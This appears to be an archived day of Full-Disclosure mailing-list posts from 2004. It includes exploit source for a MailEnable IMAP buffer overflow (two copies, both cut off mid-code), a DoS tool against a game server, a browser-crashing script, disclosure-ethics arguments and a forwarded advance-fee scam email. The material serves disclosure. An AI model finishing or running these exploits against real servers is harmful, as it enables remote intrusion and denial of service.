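 * dereferencing an attacker-chosen address. The hardened message keeps the
 * value as a number: it is logged, never used as a pointer.
 * Returns the message length, or -1 if it did not fit in buf. */
int format_crash_message(const struct join_request *r, char *buf, size_t bufsz)
{
    int n = snprintf(buf, bufsz, "player %s had crash at 0x%08x\n",
                     r->nick, (unsigned)r->crash_addr);
    return (n < 0 || (size_t)n >= bufsz) ? -1 : n;
}

int main(void)
{
    /* constructed sample: nickname "Luigi" followed by the value 0x04d2 (1234) */
    static const unsigned char sample[] = "Luigi\0\xd2\x04\x00\x00";
    struct join_request r;
    char msg[64];
    if (parse_join_request(sample, sizeof sample - 1, &r) == 0 &&
        format_crash_message(&r, msg, sizeof msg) > 0)
        fputs(msg, stdout);          /* player Luigi had crash at 0x000004d2 */
    return 0;
}
```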


###

===
3) The Code
===


http://aluigi.altervista.org/fakep/swbfp.zip


A] swbfp -s 100 localhost

sends a nickname of 100 chars to the server


B] swbfp -m 1234 localhost

forces the server to read the data at offset 1234 (0x04d2)


###

==
4) Fix
==


No fix.
My first mail is dated 26 Oct 2004; the developers said they were working
on fixing the bugs, but after all this time and after the release of 2
normal patches (so, not for these bugs) the situation is unknown...
it is useless to ask Pandemic for the status of the patch, my latest two
keep-alive mails have been completely ignored.


###


--- 
Luigi Auriemma
http://aluigi.altervista.org

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] [HAT-SQUAD] Remote buffer overflow in MailEnable IMAP service

2004-11-25 Thread class 101



Hat-Squad Advisory: Remote buffer overflow in MailEnable IMAP service

Product: MailEnable Mail Server
Vendor Url: http://www.mailenable.com
Version: MailEnable Professional Edition v1.52, MailEnable Enterprise Edition v1.01
Vulnerability: Remote buffer overflow in IMAP service
Release Date: 26 November, 2004

Vendor Status:
Informed on 24 November 2004
Response: 24 November 2004
Fixed on 25 November 2004

Overview:

MailEnable's Mail Server software provides an enterprise messaging platform
for Microsoft Windows NT/2000/XP/2003 systems. MailEnable Professional IMAP
services allow users to have server hosted folders and subfolders. Two
vulnerabilities were discovered by Hat-Squad Team in MailEnable's IMAP
service including a stack based buffer overflow and an object pointer
overwrite, both can lead to remote execution of arbitrary code.

Problem:

1. Stack based Buffer Overflow:

Due to a boundary check bug in the IMAP service, sending a client command
with more than 8198 bytes will cause a stack buffer overflow. This
vulnerability can be triggered before any kind of authentication.

Sample Request:

as a result EIP will be overwritten with ret_addr.

Proof Of Concept Exploit by class101 ([EMAIL PROTECTED]) :

/*

MailEnable , IMAP Service, Remote Buffer Overflow Exploit v0.3

Homepage : www.mailenable.com
Affected versions: Pro v1.52 Enterprise v1.01

Bug discovery : Nima Majidi at www.hat-squad.com
Exploit code : class101 at www.hat-squad.com
               dfind.kd-team.com

Fix : http://mailenable.com/hotfix/MEIMAPS-HF041125.zip

Compilation :
101_ncat.cpp . Win32 (MSVC,cygwin)
101_ncat.c ... Linux

*/

#include <stdio.h>
#include <string.h>
#include <time.h>
#ifdef WIN32
#include "winsock2.h"
#pragma comment(lib, "ws2_32")
#else
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#endif

// BIND shellcode port 101, XORed 0x88, thanx HDMoore.


static char payload[1];

char magikcll[]="\x7a\x8c\x01\x10"; // CALL EDI - MEAISP.dll - "Universal"
char gay[]="\x4b\x2d\x4f\x54\x69\x4b"; // long F0CK to them

void usage(char* us);

#ifdef WIN32
WSADATA wsadata;
#endif

void ver();

int main(int argc,char *argv[])
{
    ver();
    if ((argc<3)||(argc>4)||(atoi(argv[1])<1)||(atoi(argv[1])>1)){usage(argv[0]);return -1;}
#ifndef WIN32
#define Sleep sleep
#define SOCKET int
#define closesocket(s) close(s)
#else
    if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){printf("[+] wsastartup error\n");return -1;}
#endif
    int ip=htonl(inet_addr(argv[2])), sz, port, sizeA, a;
    char *target, *os;
    if (argc==4){port=atoi(argv[3]);}else port=143;
    if (atoi(argv[1]) == 1){target=magikcll;os="Win2k SP4 Pro English\n[+] Win2k SP4 Pro French\n[+] Win2k SP4 Server English\n[+] all Win2k, NT4 (supposed)";}
    SOCKET s;
    fd_set mask;
    struct timeval timeout;
    struct sockaddr_in server;
    if (s=socket(AF_INET,SOCK_STREAM,0)==-1){printf("[+] socket() error\n");return -1;}
    printf("[+] target: %s\n",os);
    server.sin_family=AF_INET;
    server.sin_addr.s_addr=htonl(ip);
    server.sin_port=htons(port);
    connect(s,(struct sockaddr *)&server,sizeof(server));
    timeout.tv_sec=3;
    timeout.tv_usec=0;
    FD_ZERO(&mask);
    FD_SET(s,&mask);
    switch(select(s+1,NULL,&mask,NULL,&timeout)){
    case -1:

Re: [Full-Disclosure] University Researchers Challenge Bush Win In Florida

2004-11-25 Thread Steve Wray
Todd Towles wrote:
Did the charter say something about political messages?..please take it
off the list guys if possible...
Actually, I thought that particular post was in the spirit of the list...
It seemed to me to address technologies and methodologies.
I didn't think that it dwelled on party political issues. Though, to be 
honest, I think Paul should have sent that last one just to the 
addressee not to the list. But he does come up with some gems so he 
won't go on my plonkers list :)

If you want to be truly pedantic as to what counts as political, well... 
there wouldn't be much to choose from. Everything is politics if you 
squint hard enough.

I find the best method of dealing with full disclosure is that every 
time you see someone post something you consider off topic or a troll or 
whatever suits your taste, simply filter their address out.

Filtering by subject doesn't help much as trolls will post to *anything* 
but trolls *will* post. So as long as I filter out anyone that seems 
like a troll (or otherwise an idiot) full disclosure comes up with some 
gems.

And the best part is that if someone on your plonker list says something 
genuinely interesting, they will doubtless be quoted by someone else so 
you may still get to read it. And the list has an archive.

Without filters I'd have left FD years ago...

-Original Message-
From: [EMAIL PROTECTED] 
[mailto:[EMAIL PROTECTED] On Behalf Of 
Paul Schmehl
Sent: Wednesday, November 24, 2004 11:22 AM
To: Jason Coombs; Gregory Gilliss; [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] University Researchers 
Challenge Bush Win In Florida

--On Wednesday, November 24, 2004 05:39:31 AM + Jason 
Coombs [EMAIL PROTECTED] wrote:
[massive snip]
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


RE: [Full-Disclosure] Fwd: Hi, It's Me !!!!!

2004-11-25 Thread Todd Towles
Could you please not forward your spam to the list. This is a 411
scam...if you don't know what that is..then please contact this person
and talk to him.

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of 
 john morris
 Sent: Thursday, November 25, 2004 7:00 AM
 To: [EMAIL PROTECTED]
 Subject: [Full-Disclosure] Fwd: Hi, It's Me !
 
 -- Forwarded message --
 From: [EMAIL PROTECTED] [EMAIL PROTECTED]
 Date: Wed, 24 Nov 2004 21:08:16 -0800
 Subject: Hi, It's Me !
 To: 
 
 
 FROM THE DESK OF BARRISTER. Wisdom Joshua (ESQ).
 
 Dear,
 
 I am Wisdom Joshua Esq., a Senior Advocate of Nigeria . I am 
 the legal Representative to Mr. Harold Lebron, a national of 
 your country, who used to work with Shell Development Company 
 in Nigeria. Here in after shall be referred to as my client.
 
 On the 21st of April 2001, my client, his wife and their only 
 daughter were involved in a fire outbreak in there residence. 
 All of the family members unfortunately lost there lives. 
 Since then I have made several enquiries to your embassy here 
 to locate any of my clients extended relatives, this has also 
 proved unsuccessful. After these several unsuccessful 
 attempts, I decided to track his closest relations over the 
 Internet, hence I contacted you.
 
 I have contacted you to assist in returning the fund valued 
 at 16,000,000.00 USD left behind by my client before it gets 
 confiscated or declared unserviceable by the Vault Company or 
 Managers where this huge amount were Lodged. The said Finance 
 Company has issued me a notice to provide the relatives or 
 families of the deceased or have the account confiscated 
 within the next fourteen official working days. For the fact 
 that I have been unsuccessful in locating the relatives for 
 over 2 years now, I seek the consent to present you as the 
 family member to the deceased, so that the proceeds of this 
 account can be paid to you.
 
 Secondly he has a consignment tagged 'family valuables' he 
 shipped or lifted by as cargo to Europe early the same year 
 he died, according to the information he passed to me, it is 
 of a important to him.
 
 Therefore, if you are interested, endeavor to reach me 
 immediately on my other email as thus:
 [EMAIL PROTECTED] to enable me inform you the modalities on 
 how to carry out this project. I have all necessary 
 information and legal documents needed to back you up for 
 claim. All I require from you is your honest cooperation to 
 enable us see this transaction through. I guarantee that this 
 will be executed under legitimate arrangement that will 
 protect you from any breach of the law.
 
 Please get in touch with me as soon as possible to enable us 
 conclude in this matter.
 
 Best regards,
 
 Barrister Wisdom Joshua Esq.
 
 
 
 
 
 --
 (FROM LINKS TO LINKS WE ARE ALL LINKED)
 
 cheers.
 
 morris
 
 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.netsys.com/full-disclosure-charter.html
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Re: Sun Java Plugin arbitrary package access vulnerability

2004-11-25 Thread Exchange
- Original Message - 
From: Alla Bezroutchko [EMAIL PROTECTED]
To: [EMAIL PROTECTED]; [EMAIL PROTECTED]
Sent: Thursday, November 25, 2004 4:33 AM
Subject: [Full-Disclosure] Re: Sun Java Plugin arbitrary package access
vulnerability

 As noted by rodmoses(at)yahoo(dot)com Opera remains vulnerable even
 after the upgrade of JVM to version 1.4.2_06. (tested on Windows XP SP2,
 Opera 7.54, J2SE 1.4.2_06).

This wasn't mentioned in the original disclosure announcement, but is it
safe to assume that jre-1.5.0 would *not* be vulnerable?  Or has it not been
tested?

Paul Schmehl ([EMAIL PROTECTED])
Adjunct Information Security Officer
University of Texas at Dallas
http://www.utdallas.edu/
AVIEN Founding Member

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] Re: To anybody who's offended by my disclosure policy

2004-11-25 Thread Gadi Evron
Berend-Jan Wever wrote:
I will try to explain this all once again, but only ONCE again:
If you repeat it often enough, maybe I'll get it.
MSIE IFRAME bufferoverflow:
I did not disclose the vulnerability: I wrote an analysis of a publicly known 
vulnerability. It was a warning that there could be malicious people stealing 
your creditcard details and whatnot with a 0day exploit. Nobody seemed to 
notice... Maybe the advisory was too technical, maybe the vendor didn't want bad 
publicity, I don't know. I figured it was in everybody's interest to make the 
exploit public knowledge so everybody would take notice and could take 
precautions. In that I succeeded. What did I get for all this ? Fame and 
attention.
So you want fame and attention. I am glad you admit it and I appreciate 
you for it. Most will cover it with BS.

But who has to die for your fame and attention?
MSIE nested array sort() loop Stack overflow exception:
People are expecting me to play by their rules but they do not offer me 
anything in return.
You just said you want fame and attention - so what do you care if you 
get paid? Plus.. nobody is MAKING you do ANYTHING.

I've had enough of that, so I decided to release this without enough details. Instead of relying on me for information, you now have to rely on your vendor. Let's see how long it takes them to come up with an analysis. Firefox and Opera just got caught in the crossfire.
Ahh, so although I sympathize and understand how vendors can really 
suck and not give credit and/or inform of fixing a vulnerability - it is 
part of the business. Instead of accepting that or releasing information 
appropriately (according to any standards), you decided to get upset, 
kick some dust and say: NOW YOU'LL PAY!.

My disclosure policy:
Most vendors treat hackers like free beta-testers that they can put the blame 
on when publicity goes bad. Mozilla does pay for remotely exploitable vulnerabilities. 
Fact of the matter is I could have released more IE 0day exploits if I wanted to, but 
I've chosen to disclose them responsibly. That choice was made a lot easier by iDefense, 
who do pay people for their time and knowledge. I have also found other vulnerabilities 
in Firefox, but I also choose not to disclose them until I've analysed them and reported 
them to the vendor.
So, basically - if you don't get paid (IE case), you don't bother to 
disclose responsibly? Why bother researching the vulnerability and waste 
your time in the first place?

So what do I get for all my time and work ?
- Do I get paid ? No.
I wonder why. The security industry may be about both very smart and 
very stupid people, but it is also about integrity. You blatantly state 
you don't have any.

- Do I get n00bs trying to flame me ? Yes.
It is not about flaming, it is about attention. You wanted attention - 
you got it. Nobody promised what kind of attention you'd get.

Do things differently, and you'll get a different kind of attention.
- Do I get attention from people who do know what I am talking about and might want to hire me to work for them ? Yes.
Good luck. No sarcasm intended.
PS. Recursive function call will cause stack overflow causing write exception in guard page on a push, no control over registers: no exploit.
P.S.S.
RIGHT.
Gadi.
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] More Browser on Macosx flaws: nested array sort() loop Stack overflow exception

2004-11-25 Thread Marco Mella
Same problems on MACOSX 10.3.6 with:
-Safari 1.2.4
-Mozilla 1.7
-Camino 0.7.0
-Firefox 1.0
-Opera 6.0.3

Not affected IE 5.2.3

Regards
--
Marco Mella


-

  Hi all,

  Same flaw works for Firefox as well as MSIE:

  <HTML>
    <SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
    <SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
  </HTML>

  Added to the list:
http://www.edup.tudelft.nl/~bjwever/advisory_firefox_flaws.html

  I'd have loved to CC mozilla about this, but I
didn't have the time to do the crash course how to
write a bug report and go through all   that bugzilla
crap.

  Cheers,
  SkyLined
  http://www.edup.tudelft.nl/~bjwever






___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] Re: FIREFOX flaws: nested array sort() loop Stack overflow exception

2004-11-25 Thread James Tait
 I'd have loved to CC mozilla about this, but I didn't have the time to
 do the crash course how to write a bug report and go through all
 that bugzilla crap.

No need, someone went through all that bugzilla crap for you:

  https://bugzilla.mozilla.org/show_bug.cgi?id=271716
  https://bugzilla.mozilla.org/show_bug.cgi?id=271718

JT
-- 
-+
James Tait, BSc  |XMPP: [EMAIL PROTECTED]
Programmer and Open Source advocate  |  Mobile: +44 (0)7779 337596
-+


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] Re: FIREFOX flaws: nested array sort() loop Stack overflow exception

2004-11-25 Thread Gadi Evron
I'd have loved to CC mozilla about this, but I didn't have the time to do the crash course how to write a bug report and go through all that bugzilla crap.
So instead you unleash it upon kiddie and spammer world? That's lovely.
Next you will come by again and say: I'm still hoping I get to see the
guy who wrote those MyDoom worms in court, he violated the GPL and
spread millions(?) of copies of my (modified) source).
So, you release it like you did and, expect what?
Some people are advocates of this or that disclosure mechanism, and
believe they are right. I can bite.
You just say: I'm so cool. I will release this, get a ton of attention
and then say 'hey! They violated GPL! How dare they?!'
Full disclosure. Responsible disclosure (according to whoever).
Non-disclosure. Fine. What are you doing?
Gadi.
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] MSIE flaws: nested array sort() loop Stack overflow exception

2004-11-25 Thread Frank Denis (Jedi/Sector One)
On Thu, Nov 25, 2004 at 12:17:42PM +0200, Adi Pircalabu wrote:
 Also Opera 7.54 should be added, it crashes on the above code, at least
 the native FreeBSD version

  It looks like Konqueror (3.3.1) is safe.
  
  After a few seconds, the script stops and a popup tells the user that a
script is blocking KHTML and that if it keeps running, other apps can be
impacted.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] [HAT-SQUAD][Sploit-FIXed-sorry] Remote buffer overflow in MailEnable IMAP service

2004-11-25 Thread class 101



Hat-Squad Advisory: Remote buffer overflow in MailEnable IMAP service

Product: MailEnable Mail Server
Vendor Url: http://www.mailenable.com
Version: MailEnable Professional Edition v1.52, MailEnable Enterprise Edition v1.01
Vulnerability: Remote buffer overflow in IMAP service
Release Date: 26 November, 2004

Vendor Status:
Informed on 24 November 2004
Response: 24 November 2004
Fixed on 25 November 2004

Overview:

MailEnable's Mail Server software provides an enterprise messaging platform
for Microsoft Windows NT/2000/XP/2003 systems. MailEnable Professional IMAP
services allow users to have server hosted folders and subfolders. Two
vulnerabilities were discovered by Hat-Squad Team in MailEnable's IMAP
service including a stack based buffer overflow and an object pointer
overwrite, both can lead to remote execution of arbitrary code.

Problem:

1. Stack based Buffer Overflow:

Due to a boundary check bug in the IMAP service, sending a client command
with more than 8198 bytes will cause a stack buffer overflow. This
vulnerability can be triggered before any kind of authentication.

Sample Request:

as a result EIP will be overwritten with ret_addr.
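An added example (not Hat-Squad's code and not MailEnable's) for the boundary-check bug described in this advisory and in its first posting above: an IMAP command reader that rejects an overlong line before copying any of it. IMAP_CMD_MAX reuses the advisory's 8198-byte figure; the function name, the status codes and the constructed input in main() are assumptions.

```c
/* Added example (not Hat-Squad's or MailEnable's code): a bounded IMAP
 * command reader. IMAP_CMD_MAX reuses the advisory's 8198-byte figure;
 * the API and status codes are assumptions for illustration. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define IMAP_CMD_MAX 8198   /* longest command line accepted, excluding CRLF */

enum imap_read_status { IMAP_CMD_OK, IMAP_CMD_INCOMPLETE, IMAP_CMD_TOO_LONG };

/* The vulnerable shape, for contrast only (not compiled): copy bytes until
 * CRLF into a fixed stack buffer, trusting the client to stop in time.
 *     char cmd[8198]; size_t i = 0;
 *     while (!(in[i] == '\r' && in[i + 1] == '\n')) { cmd[i] = in[i]; i++; }
 * Nothing bounds i, so a longer line overwrites whatever follows cmd. */

/* Hardened reader. Copies one complete line (without its CRLF) into out only
 * if it is at most IMAP_CMD_MAX bytes and fits in out; otherwise it copies
 * nothing. *consumed tells the caller how many input bytes to discard so the
 * connection can resync at the next line after a rejected one. */
enum imap_read_status imap_read_command(const char *in, size_t inlen,
                                        char *out, size_t outsz,
                                        size_t *consumed)
{
    size_t limit = (outsz - 1 < IMAP_CMD_MAX) ? outsz - 1 : IMAP_CMD_MAX;
    const char *crlf = NULL;
    for (size_t i = 0; i + 1 < inlen; i++) {
        if (in[i] == '\r' && in[i + 1] == '\n') { crlf = in + i; break; }
    }
    if (crlf != NULL) {
        size_t linelen = (size_t)(crlf - in);
        *consumed = linelen + 2;            /* skip the line and its terminator */
        if (linelen > limit)
            return IMAP_CMD_TOO_LONG;       /* rejected before any byte is copied */
        memcpy(out, in, linelen);
        out[linelen] = '\0';
        return IMAP_CMD_OK;
    }
    if (inlen <= limit + 1) {               /* may still be a valid line in progress */
        *consumed = 0;
        return IMAP_CMD_INCOMPLETE;
    }
    *consumed = inlen;                      /* over the limit and no CRLF yet: discard */
    return IMAP_CMD_TOO_LONG;
}

int main(void)
{
    /* constructed input: a normal command followed by one 8199 bytes long */
    static char stream[IMAP_CMD_MAX + 64];
    static char cmd[IMAP_CMD_MAX + 1];
    size_t n = 0, used = 0, pos = 0;
    n += (size_t)sprintf(stream, "a001 CAPABILITY\r\n");
    memset(stream + n, 'A', IMAP_CMD_MAX + 1);
    n += IMAP_CMD_MAX + 1;
    memcpy(stream + n, "\r\n", 2);
    n += 2;
    while (pos < n) {
        enum imap_read_status st =
            imap_read_command(stream + pos, n - pos, cmd, sizeof cmd, &used);
        if (st == IMAP_CMD_INCOMPLETE)
            break;                          /* wait for more data from the client */
        printf("%s (%zu bytes)\n",
               st == IMAP_CMD_OK ? "accepted" : "rejected: too long", used);
        pos += used;
    }
    return 0;
}
```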

Proof Of Concept Exploit by class101 ([EMAIL PROTECTED]) :

/*

MailEnable , IMAP Service, Remote Buffer Overflow Exploit v0.4

Homepage : www.mailenable.com
Affected versions: Pro v1.52 Enterprise v1.01

Bug discovery : Nima Majidi at www.hat-squad.com
Exploit code : class101 at www.hat-squad.com
               dfind.kd-team.com

Fix : http://mailenable.com/hotfix/MEIMAPS-HF041125.zip

Compilation :
101_ncat.cpp . Win32 (MSVC,cygwin)
101_ncat.c ... Linux

*/

#include <stdio.h>
#include <string.h>
#include <time.h>
#ifdef WIN32
#include "winsock2.h"
#pragma comment(lib, "ws2_32")
#else
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#endif

// BIND shellcode port 101, XORed 0x88, thanx HDMoore.


static char payload[1];

char magikcll[]="\x7a\x8c\x01\x10"; // CALL EDI - MEAISP.dll - "Universal"
char gay[]="\x4b\x2d\x4f\x54\x69\x4b"; // long F0CK to them

void usage(char* us);

#ifdef WIN32
WSADATA wsadata;
#endif

void ver();

int main(int argc,char *argv[])
{
    ver();
    if ((argc<3)||(argc>4)||(atoi(argv[1])<1)||(atoi(argv[1])>1)){usage(argv[0]);return -1;}
#ifndef WIN32
#define Sleep sleep
#define SOCKET int
#define closesocket(s) close(s)
#else
    if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){printf("[+] wsastartup error\n");return -1;}
#endif
    int ip=htonl(inet_addr(argv[2])), sz, port, sizeA, a;
    char *target, *os;
    if (argc==4){port=atoi(argv[3]);}else port=143;
    if (atoi(argv[1]) == 1){target=magikcll;os="Win2k SP4 Pro English\n[+] Win2k SP4 Pro French\n[+] Win2k SP4 Server English\n[+] all Win2k, NT4 (supposed)";}
    SOCKET s;
    fd_set mask;
    struct timeval timeout;
    struct sockaddr_in server;
    s=socket(AF_INET,SOCK_STREAM,0);
    if (s==-1) {printf("[+] socket() error\n");return -1;}
    printf("[+] target: %s\n",os);
    server.sin_family=AF_INET;
    server.sin_addr.s_addr=htonl(ip);
    server.sin_port=htons(port);
    connect(s,(struct sockaddr *)&server,sizeof(server));
    timeout.tv_sec=3;
    timeout.tv_usec=0;
    FD_ZERO(&mask);
    FD_SET(s,&mask);
    switch(select(s+1,NULL,&mask,NULL,&timeout)){
    case -1:

[Full-Disclosure] Rumours about Opera

2004-11-25 Thread Marc Schoenefeld

Hi y'all,

to clear some rumours about Opera 7.54:

The opera guys use their own binding from javascript to java, which does not
conform to the java plug-in. Moreover they explicitly allowed access to the
sun.* packages in the default security configuration, so there is no need
for a magic exploit.  I reported that misery to opera on the 1st of
september, so they should be aware of their java problems.

Remember that java 1.4.2_04 (and less) driven applets also allow covert
channels between applets from different sites. This is exploitable by a
second order attack where a shared public variable in the XSLT processor can
be used by a passive attacker. He is able to inject a piece of sleeping java
code in the JVM which gets executed when the XSLT processor is invoked.
There is a Sun advisory out there that came out in August, which warns
about the issue.

Java 1.4.2_05 also has a vulnerability in the serialization APIs (used by
RMI) that allows to overload a remote JVM [and drive uptime loads
to the 100s]. I reported that to Sun on the 11th of April.
It is fixed in 1.4.2_06, too.

P.S.: Have phun with java, but maybe you should consider
python for productivity.
[http://www.ferg.org/projects/python_java_side-by-side.html , great
stuff steven!]

marc schoenefeld
http://www.illegalaccess.org





On Thu, 25 Nov 2004, Alla Bezroutchko wrote:

 Date: Thu, 25 Nov 2004 11:33:03 +0100
 From: Alla Bezroutchko [EMAIL PROTECTED]
 To: [EMAIL PROTECTED], [EMAIL PROTECTED]
 Subject: Re: Sun Java Plugin arbitrary package access vulnerability

 Jouko Pynnonen wrote:

  A vulnerability in Java Plugin allows an attacker to create an Applet
  which can disable Java's security restrictions and break out of the
  Java sandbox.

 skip

  The Java Plugin versions 1.4.2_04 and 1.4.2_05 were tested on Windows
  and Linux. Web browsers tested were Microsoft Internet Explorer,
  Mozilla Firefox and Opera. It should be noted that Opera uses a
  different way of connecting JavaScript and Java which caused the test
  exploit not to work on Opera. However the problem itself (access to
  private packages) was demonstrated on Opera too, so it may be
  vulnerable to a variation of the exploit.

 As noted by rodmoses(at)yahoo(dot)com Opera remains vulnerable even
 after the upgrade of JVM to version 1.4.2_06. (tested on Windows XP SP2,
 Opera 7.54, J2SE 1.4.2_06).

 According to Jouko, Opera does not use Java plugin, but has its own
 interface to Java. The fact that the problem is still present after JVM
 upgrade probably means that there is an independent bug in Opera Java
 interface which has the same effect as the bug in Sun Java Plugin.

 AFAIK there is no fix for Opera yet. I have reported this bug to Opera
 through their web interface (bug-158156).

 There is an online test for this bug at Browser Security Test
 (http://bcheck.scanit.be/bcheck/). Go to
 http://bcheck.scanit.be/bcheck/choosetests.php if you only want to run
 the test for this particular bug.

 Alla.



--

Never be afraid to try something new. Remember, amateurs built the
ark; professionals built the Titanic. -- Anonymous

Marc Schönefeld Dipl. Wirtsch.-Inf. / Software Developer

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] FIREFOX flaws: nested array sort() loop Stack overflow exception

2004-11-25 Thread Juan Carlos Navea
 So instead you unleash it upon kiddie and spammer world? That's lovely.

 Next you will come by again and say: I'm still hoping I get to see the
 guy who wrote those MyDoom worms in court, he violated the GPL and
 spread millions(?) of copies of my (modified) source).

 So, you release it like you did and, expect what?
 
 Some people are advocates of this or that disclosure mechanism, and
 believe they are right. I can bite.
 You just say: I'm so cool. I will release this, get a ton of attention
 and then say 'hey! They violated GPL! How dare they?!'

 Full disclosure. Responsible disclosure (according to whoever).
 Non-disclosure. Fine. What are you doing?

I agree, not to mention that that bugzilla crap is not really crap.
I find it to be a solid system for the most part. Also, it has been
proven that involving the general public to help out in filing bugs
has been useful in resolving problems that would otherwise go
unnoticed until script kiddies start abusing them.

Plus bugzilla is not really that hard to use, takes just a few minutes really. 


-- 
http://www.loconet.ca



RE: [Full-Disclosure] FIREFOX flaws: nested array sort()

2004-11-25 Thread RandallM
 
So, where do you all stand? Exploit for fame or for purpose?

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of 
 Berend-Jan Wever
 Sent: 25 November 2004 01:05
 To: [EMAIL PROTECTED]; 
 [EMAIL PROTECTED]; [EMAIL PROTECTED]
 Subject: [Full-Disclosure] FIREFOX flaws: nested array sort() 
 loop Stack overflow exception
 
 Hi all,
 
 Same flaw works for Firefox as well as MSIE:
 
 <HTML>
   <SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
   <SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
 </HTML>
 
 Added to the list: 
 http://www.edup.tudelft.nl/~bjwever/advisory_firefox_flaws.html
 
 I'd have loved to CC mozilla about this, but I didn't have 
 the time to do the crash course how to write a bug report 
 and go through all that bugzilla crap.
 
 Cheers,
 SkyLined
 http://www.edup.tudelft.nl/~bjwever



Randall M
 




RE: [Full-Disclosure] IE is just as safe as FireFox

2004-11-25 Thread Phillip R. Paradis
  Nice ...fresh from the oven too. This, if it works, should be a 
  'extremely critical' update from Ms.
  
  Wouldn't such a tool be of limited utility, given that the unprivileged
  application's windows are on the same desktop as, and can therefore send
  messages to, windows belonging to privileged applications?
 
 I'm sorry but seeing other people insist that is OK to send 
 American election stuff to the list, I thought it would be OK 
 to translate your text into something that made sense so here goes:
 
 Un tal attrezzo non sarebbe di programma di utilità limitato, 
 dato che unpriviliged le finestre dell'applicazione sono 
 sullo stesso tavolo come e possono quindi trasmettere i 
 messaggi a, le finestre che appartengono a priviliged le applicazioni?
 
 Naaa...sorry, I don't speak Italian so it didn't make sense to 
 me that way, either.

If you're trying to make a point, you're not doing very well. (If you truly
don't understand what I said, you might try a Google search for the strings
win32 and shatter. Neither of which is directly related to either American
elections procedures or the Italian language.)

--
Phil




Re: [Full-Disclosure] FIREFOX flaws: nested array sort() loop Stack overflow exception

2004-11-25 Thread Heikki Toivonen
Berend-Jan Wever wrote:
I'd have loved to CC mozilla about this, but I didn't have the time to do the crash course how to write a bug report and go through all that bugzilla crap.
Well, Mozilla does have a well-known security email alias for those who 
don't have the time to do a crash course on Bugzilla - see 
http://www.mozilla.org/projects/security/security-bugs-policy.html (but 
if you don't have time to visit that link, I'll save you the trouble and 
say it starts with [EMAIL PROTECTED])

Bugzilla really isn't that difficult either. Below are detailed 
instructions if anyone cares. Steps 4-6 you can ignore if you already 
have a Bugzilla account. Step 9 gives detailed info on what to fill in 
the actual bug reporting form. There are only two critically important 
pieces on that form: the details text box, and the security checkbox. 
However, carefully filling in as much information as you can will make 
it likelier the bug gets fixed faster.

1. Type bugzilla.mozilla.org in your browser's location bar and go there
2. Click the link: Report A Bug
3. Either login if you already have an account, or click create new 
account. Let's assume we need to create a new account...
4. Type in a valid email address and click Create Account
5. [mail] Read email that was sent to the address to get password
6. back on in the browser, click log in here
7. fill in your username and password and click login
8. Select product link, for example Firefox
9. there's a form to fill in, let's go over this part in detail since I 
think this is the scariest part:
9.1 There is a search box, but if you are reporting a security bug in 
the latest product, chances are there are no dupes so just jump on over
9.2 Select a component that you think most closely describes where the 
problem occurs - if you can't figure out, just choose something, for 
example General
9.3 Hardware, operating system and build identifier are already filled 
in correctly for you if you are reporting the bug in the same product 
where you found it - if you can't figure these out, don't worry - just 
describe the stuff later on
9.4 If you know a URL where this happens (for example a testcase), fill 
that in
9.5 Give a brief summary
9.6 The details are next - basically what you'd put in a vulnerability 
report email or post goes here
9.7 Next it's going to ask even in more details, just to make sure the 
developers get all the info - if you already filled these parts in the 
details section, you can ignore them. The fields are: reproducibility, 
steps to reproduce, actual results, expected results, additional information
9.8 IMPORTANT: Check that security box! This way your bug will get the 
speediest attention, and it will also restrict people's access to the bug 
until it is opened (either by you or someone else)
9.9 lastly severity
10. Submit bug report, and you are done!

Then, whenever someone changes the bug, you will get an email of the 
changes with a link to the bug. People may ask you more questions etc. 
Commenting on the bug later on is trivial - just go the URL (Bugzilla 
may ask you to login again), type in your comments in the Additional 
Comments textbox and hit the Commit button. There are a lot of other 
fields, but typically the developers and more experienced Bugzilla users 
will take care of changing those. At this point the bug basically 
resembles a normal web forum from the user's point of view.

And if you really have the time, I recommend you go read the docs that 
are linked under the When reporting a bug section on 
https://bugzilla.mozilla.org/

--
  Heikki Toivonen




Re: [Full-Disclosure] Re: FIREFOX flaws: nested array sort() loop Stack overflow exception

2004-11-25 Thread Dragos Ruiu
On November 25, 2004 07:51 am, Gadi Evron wrote:
  I'd have loved to CC mozilla about this, but I didn't have the time to do
  the crash course how to write a bug report and go through all that
  bugzilla crap.

